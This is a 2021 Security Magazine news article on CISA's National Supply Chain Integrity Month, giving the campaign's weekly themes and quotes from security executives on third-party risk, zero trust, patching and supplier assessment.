Security Magazine logo
search
cart
facebook twitter linkedin youtube
  • Sign In
  • Create Account
  • Sign Out
  • My Account
Security Magazine logo
  • NEWS
    • Security Newswire
    • Technologies & Solutions
  • MANAGEMENT
    • Leadership Management
    • Enterprise Services
    • Security Education & Training
    • Logical Security
    • Security & Business Resilience
    • Profiles in Excellence
  • PHYSICAL
    • Access Management
    • Fire & Life Safety
    • Identity Management
    • Physical Security
    • Video Surveillance
    • Case Studies (Physical)
  • CYBER
    • Cybersecurity News
    • More
  • BLOG
  • COLUMNS
    • Cyber Tactics
    • Leadership & Management
    • Security Talk
    • Career Intelligence
    • Leader to Leader
    • Cybersecurity Education & Training
  • EXCLUSIVES
    • Annual Guarding Report
    • Most Influential People in Security
    • The Security Benchmark Report
    • Top Guard and Security Officer Companies
    • Top Cybersecurity Leaders
    • Women in Security
  • SECTORS
    • Arenas / Stadiums / Leagues / Entertainment
    • Banking/Finance/Insurance
    • Construction, Real Estate, Property Management
    • Education: K-12
    • Education: University
    • Government: Federal, State and Local
    • Hospitality & Casinos
    • Hospitals & Medical Centers
    • Infrastructure:Electric,Gas & Water
    • Ports: Sea, Land, & Air
    • Retail/Restaurants/Convenience
    • Transportation/Logistics/Supply Chain/Distribution/ Warehousing
  • EVENTS
    • Industry Events
    • Webinars
    • Solutions by Sector
    • Security 500 Conference
  • MEDIA
    • Videos
      • Cybersecurity & Geopolitical Discussion
      • Ask Me Anything (AMA) Series
    • Podcasts
    • Polls
    • Photo Galleries
  • MORE
    • Call for Entries
    • Classifieds & Job Listings
    • Continuing Education
    • Newsletter
    • Sponsor Insights
    • Store
    • White Papers
  • EMAG
    • eMagazine
    • This Month's Content
    • Advertise
  • SIGN UP!
CybersecurityManagementPhysicalSecurity NewswireSecurity Enterprise ServicesSecurity Leadership and ManagementLogical SecuritySecurity & Business ResilienceSecurity Education & TrainingCybersecurity News

April is National Supply Chain Integrity Month

world security freepik

<a href='https://www.freepik.com/vectors/background'>Background vector created by starline - www.freepik.com</a>

April 12, 2021

In recognition of National Supply Chain Integrity Month, the Cybersecurity and Infrastructure Security Agency (CISA) is partnering with the Office of the Director of National Intelligence (ODNI), the Department of Defense, and other government and industry partners to promote a call to action for a unified effort by organizations across the country to strengthen global supply chains.

Information and communications technology (ICT) systems underpin a broad range of critical infrastructure activities that support critical functions within our communities, such as generating electricity, operating hospitals, and supplying clean water. If vulnerabilities in these systems and their critical hardware and software are exploited, the consequences can have cascading impacts across organizations, sectors, and National Critical Functions.

“As the number of sophisticated cyberattacks increase, we’re reminded that supply chain security in not a nice to have, but an urgent necessity,” said CISA Assistant Director Bob Kolasky. “Government and industry must work together to strengthen and enhance the security and safety of our critical infrastructure and the associated supply chains that support the resilience of our nation.”

Throughout the month of April, CISA will promote resources, tools, and information, including those developed by the public-private ICT SCRM Task Force, to help organizations and agencies integrate SCRM into their overall security posture. CISA themes for each week include:

  • Week 1: Building Collective Supply Chain Resilience,
  • Week 2: Assessing ICT Trustworthiness,
  • Week 3: Understanding Supply Chain Threats, and
  • Week 4: Knowing the Essentials.

Here's what security executives had to say in honor of National Supply Chain Integrity Month:

Dave Stapleton, CISO, CyberGRX:

“Leadership by the U.S. government is key as these security initiatives will require broad public/private partnership in order to be effective. I think this resonates with our thoughts on the need for a collaborative approach to addressing a global issue like TPCRM. Also, I like the fundamentals that the NCSC recommended: 

  • “Diversify Supply Chains”
  • “Mitigate Third-Party Risks”
  • “Identify and Protect Crown Jewels”
  • “Ensure Executive-Level Commitment”
  • “Strengthen Partnerships”

 

Jack Mannino, CEO at nVisium:

“Supply chain security will remain a front and center issue for many organizations as the fallout from recent incidents continue to unfold. In addition to traditional software security testing techniques such as code reviews and penetration testing, an increasing number of organizations may be interested in understanding how software behaves through malicious code reviews. These types of tests explore the likelihood that software contains embedded malware, through malicious code commits or by compromised third-party dependencies.”

 

Yaniv Bar-Dayan, CEO and co-founder at Vulcan Cyber:

“When a third-party tool is used to breach a business it is usually only a foot in the door. The real damage occurs if the internal systems are also vulnerable and exploitable. Never trust a single layer of protection. Remediate vulnerabilities as quickly as possible and double check that patches are being applied and mitigating actions are being taken. Considering the massive growth and scale of digital systems, and the exponential increase of vulnerabilities every year, this isn’t an easy job but it is possible to succeed.”

 

Vishal Jain, Co-Founder and CTO at Valtix:

“The need for securing supply chains has been accelerated by Covid and enterprises accelerating their digital transformation. Enterprise Infosec teams need to maintain proper checks and balances when exposing their internal valuable assets, aka the keys to the kingdom, to supply-chain vendors and 3rd party services. We have seen too many times in the past, SunBurst from SolarWinds being in recent times, that attacker enters the front gate of the organization exploiting some vulnerability in their supply change vendor. Once those assets get infected, malware can now move laterally via the network and eventually to the crown jewel holding critical data. Malware on the crown jewel connects to the command-n-control center and exfiltrates critical data out to the hacker.


Enterprises need to follow a layered defense approach to protect their assets when a breach occurs via supply chain vendor. They need to have zero-trust security built in with necessary controls to prevent lateral movement of threats (to reduce the blast radius) and egress filtering to prevent data exfiltration. Enterprises also need to evaluate moving to Cloud based services. Cloud is more secure than their on-prem data center when appropriate cloud security controls are in place. Enterprises also need to ensure that supply chain vendors they use follow the best security practices.”

 

John Hellickson, CxO Advisor, Cyber Strategy at Coalfire:

“The topic of supply chain security is often more important than we as an industry give it. Until the organization is impacted by a supplier, they themselves are the supplier who has impacted their customers, or a serious event occurs across a given sector that raises concerns by executives or the Board if they were also impacted. There are a lot of elements of a highly mature program which could be daunting when building a program from scratch, however, the larger the organization the more likely there will be elements of existing risk management practices in place that one could build upon. 

A decent supply chain risk program would include elements of Enterprise Risk, Third Party Risk, Cyber Risk, Business Continuity and Physical Security, and a leader in this space would need to also partner with procurement and product teams. When performing discovery & analysis on what is critical to the business, often informed by Business Impact Analyses (BIAs) performed within Business Continuity programs, it is important to tier vendors & suppliers accordingly. When it comes to suppliers, understanding threats facing supply chains is key. Threats such as physical tampering, inadvertent use of sensitive data, IP theft / piracy, theft / inventory manipulation, and remote infrastructure access are examples that could have an impact on supply chain risk. 

When performing due diligence and risk assessments on suppliers & vendors, it has become more relevant to leverage senior cybersecurity resources such as security architects & engineers to participate in more technical assessments of embedded systems that could be exploited within the supply chain. The type of skills these engineers/architects bring can complement the traditional auditors that are often tied to Governance, Risk and Compliance functions of an organization.

Overall, for many organizations, supply chain security should be a specific topic within enterprise risk committees, while having a dedicated focus within the organization.”

 

Joseph Carson, chief security scientist and Advisory CISO at Thycotic:

“Organizations have less control and visibility over the actual security that supply chains have put in place. For the most part, this tends to only be covered in legal contracts, rather than a true security risk assessment.  Organizations must prioritize privileged access security to reduce the risks exposed in their supply chain security.      

 

Michael Isbitski, Technical Evangelist at Salt Security:

“No longer can organizations delay patching critical, known vulnerabilities because of concerns over outages, the impact on production users, or the loss of oversight of a system. Unpatched systems are leaving important elements of the IT stack vulnerable, especially APIs, which attackers are increasingly targeting these days since they route traffic directly to valuable data and services.

There may be many cloud services (and in turn, APIs and data) that an organization is unaware of. These may be used by their own employees or in turn the partners they work with. We hear a lot of this expansion of partner ecosystems and concerns over the digital supply chain.”

 

KEYWORDS: CISA critical infrastructure cyber security risk management supply chain

Share This Story

Looking for a reprint of this article?
From high-res PDFs to custom plaques, order your copy today!

Recommended Content

JOIN TODAY
To unlock your recommendations.

Already have an account? Sign In

  • Security's Top Cybersecurity Leaders 2024

    Security's Top Cybersecurity Leaders 2024

    Security magazine's Top Cybersecurity Leaders 2024 award...
    Security Leadership and Management
    By: Security Staff
  • cyber brain

    The intersection of cybersecurity and artificial intelligence

    Artificial intelligence (AI) is a valuable cybersecurity...
    Security Leadership and Management
    By: Pam Nigro
  • artificial intelligence AI graphic

    Assessing the pros and cons of AI for cybersecurity

    Artificial intelligence (AI) has significant implications...
    Technologies & Solutions
    By: Charles Denyer
Manage My Account
  • Security eNewsletter & Other eNews Alerts
  • eMagazine Subscriptions
  • Manage My Preferences
  • Online Registration
  • Mobile App
  • Subscription Customer Service

More Videos

Sponsored Content

Sponsored Content is a special paid section where industry companies provide high quality, objective, non-commercial content around topics of interest to the Security audience. All Sponsored Content is supplied by the advertising company and any opinions expressed in this article are those of the author and not necessarily reflect the views of Security or its parent company, BNP Media. Interested in participating in our Sponsored Content section? Contact your local rep!

close
  • Sureview screen
    Sponsored bySureView Systems

    The Evolution of Automation in the Command Center

  • Crisis Response Team
    Sponsored byEverbridge

    Automate or Fall Behind – Crisis Response at the Speed of Risk

  • Perimeter security
    Sponsored byAMAROK

    Why Property Security is the New Competitive Advantage

Popular Stories

Rendered computer with keyboard

16B Login Credentials Exposed in World’s Largest Data Breach

Verizon on phone screen

61M Records Listed for Sale Online, Allegedly Belong to Verizon

Security’s 2025 Women in Security

Security’s 2025 Women in Security

Red spiderweb

From Retail to Insurance, Scattered Spider Changes Targets

blurry multicolored text on black screen

PowerSchool Education Technology Company Announces Data Breach

2025 Security Benchmark banner

Events

July 17, 2025

Tech in the Jungle: Leveraging Surveillance, Access Control, and Technology in Unique Environments

What do zebras, school groups and high-tech surveillance have in common? They're all part of a day’s work for the security team at the Toledo Zoo.

August 7, 2025

Threats to the Energy Sector: Implications for Corporate and National Security

The energy sector has found itself in the crosshairs of virtually every bad actor on the global stage.

View All Submit An Event

Products

Security Culture: A How-to Guide for Improving Security Culture and Dealing with People Risk in Your Organisation

Security Culture: A How-to Guide for Improving Security Culture and Dealing with People Risk in Your Organisation

See More Products

Related Articles

  • CISA NSA NCSAM

    October is National Cybersecurity Awareness Month

    See More
  • supply-chain-freepik1170x658v5.jpg

    Securing information and communications technology supply chain

    See More
  • supply chain 4 responsive default security

    Senate Bill Would Create a National Supply Chain Security Center

    See More

Related Products

See More Products
  • 9780367030407.jpg

    National Security, Personal Privacy and the Law

See More Products
×

Sign-up to receive top management & result-driven techniques in the industry.

Join over 20,000+ industry leaders who receive our premium content.

SIGN UP TODAY!
  • RESOURCES
    • Advertise
    • Contact Us
    • Store
    • Want More
  • SIGN UP TODAY
    • Create Account
    • eMagazine
    • eNewsletter
    • Customer Service
    • Manage Preferences
  • SERVICES
    • Marketing Services
    • Reprints
    • Market Research
    • List Rental
    • Survey/Respondent Access
  • STAY CONNECTED
    • LinkedIn
    • Facebook
    • YouTube
    • X (Twitter)
  • PRIVACY
    • PRIVACY POLICY
    • TERMS & CONDITIONS
    • DO NOT SELL MY PERSONAL INFORMATION
    • PRIVACY REQUEST
    • ACCESSIBILITY

Copyright ©2025. All Rights Reserved BNP Media.

Design, CMS, Hosting & Web Development :: ePublishing